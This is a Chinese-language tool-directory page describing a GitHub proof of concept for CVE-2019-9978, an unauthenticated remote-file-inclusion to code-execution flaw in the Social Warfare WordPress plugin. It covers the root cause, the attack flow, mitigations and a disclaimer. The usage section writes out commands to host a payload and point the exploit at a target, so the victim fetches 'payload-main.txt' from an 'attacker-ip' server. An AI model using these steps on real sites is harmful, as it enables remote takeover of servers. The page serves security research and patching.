Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

一个自定义 Python 概念验证(PoC),展示对 CVE 2019-9978(Social Warfare 插件)的根因分析与漏洞利用,重点聚焦于从 RFI 到 RCE 的实用攻击流程。

查看仓库
128个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-9978 RCE PoC – Social Warfare WordPress 插件漏洞利用

未认证远程文件包含 (RFI) 到远程代码执行 (RCE)


📌 描述

该仓库包含一个基于 Python 的概念验证 (PoC),演示了 CVE-2019-9978 的利用过程,该漏洞是 Social Warfare WordPress 插件中的一个严重漏洞。

该漏洞允许未认证的攻击者执行远程文件包含 (RFI),通过在攻击者控制的服务器上托管恶意负载,可将其升级为*远程代码执行 (RCE)**。

此 PoC 是在受控的 WordPress 实验室环境中开发和测试的,仅供教育和授权的安全测试使用。


🔍 漏洞摘要

  • CVE 编号: CVE-2019-9978
  • 受影响组件: Social Warfare(WordPress 插件)
  • 受影响版本: ≤ 3.5.2
  • 漏洞类型: 远程文件包含 (RFI)
  • 影响: 远程代码执行 (RCE)
  • 是否需要认证: 否
  • 攻击向量: 远程
  • 严重性: 严重

🧠 根本原因分析

Social Warfare 插件未能正确验证和清理用于远程内容包含的用户输入。
因此,攻击者可以提供一个恶意外部 URL,从而导致未认证的远程文件包含。

当被包含的远程文件中含有可执行的 PHP 代码时,这些代码将在 WordPress 服务器的上下文中执行,从而导致远程代码执行。


🔄 攻击流程

root@kitploit:~

Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)


🧪 概念验证 (PoC)

  1. 攻击者在外部 HTTP 服务器上托管恶意负载
  2. 存在漏洞的 Social Warfare 端点包含远程文件
  3. 负载在目标 WordPress 服务器上执行
  4. 攻击者获得远程命令执行能力
  5. 该漏洞利用脚本将此过程自动化,用于测试和研究目的

▶️ 用法

第 1 步:托管负载

root@kitploit:~
python3 -m http.server 8000

将你的负载文件(例如 payload-main.txt)放置在服务器目录中。


第 2 步:执行漏洞利用

root@kitploit:~
python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt

🛠 环境要求

  • Python 3.x
  • 存在漏洞的 Social Warfare WordPress 插件版本
  • WordPress 测试环境
  • 用于托管负载的本地或远程 HTTP 服务器

🛡 缓解与防御措施

  • 将 Social Warfare 插件更新到已修补的版本

  • 禁用远程文件包含:

    root@kitploit:~
    allow_url_include = Off
    
  • 限制 WordPress 插件中的外部 URL 处理

  • 部署带有 RFI 检测规则的 Web 应用防火墙 (WAF)


⚠️ 法律免责声明

本项目严格仅用于教育目的和授权的安全测试。

未经明确许可,请不要将此概念验证用于任何系统。 作者不对因使用此工具而造成的任何滥用或损害负责。


🔗 参考与致谢

  • 原始研究人员: Luka Sikic
  • 原始 PoC 参考: https://github.com/hash3liZer/CVE-2019-9978
  • 作者 / 改编: Vaidehi Muluru

下载工具